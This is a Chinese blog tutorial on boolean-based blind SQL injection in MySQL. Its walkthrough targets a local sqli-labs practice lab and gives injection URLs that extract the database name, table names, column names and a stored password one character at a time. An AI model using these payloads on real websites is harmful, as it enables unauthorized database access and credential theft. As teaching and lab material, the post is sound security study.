小言_互联网的博客

Mysql注入 -- 布尔注入

188人阅读  评论(0)

千万不要在你还没辞职的时候,告诉你同事说要辞职了。。。

----  网易云热评   

一、常用函数

1、mid(str,1,5):取字符串str的前5个字节

2、ord():转换成ASCII码

3、length():统计长度

4、 ascii():将字符转换ASCII

二、实例演示

1、and 1=1

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=1 --+ 返回正确

2、and 1=2

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=2 --+ 返回错误

3、判断数据库长度

http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=8 --+返回正常,说明数据库长度为8http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=9 --+返回错误

4、判断数据库第一个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),1,1)='s' --+ 不停的修改二十六个字母,知道正确为之

5、判断数据库第二个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),2,1)='e' --+ 最终获取数据库的名称为“security”

6、获取表名,最终获取表名users

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+

7、获取字段名,最终获取字段名password

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+

8、获取字段内容,最终获取一个名为admin的内容

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select password from users limit 8,1),1,1)='a' --+

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧


转载:https://blog.csdn.net/weixin_41489908/article/details/116805168
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场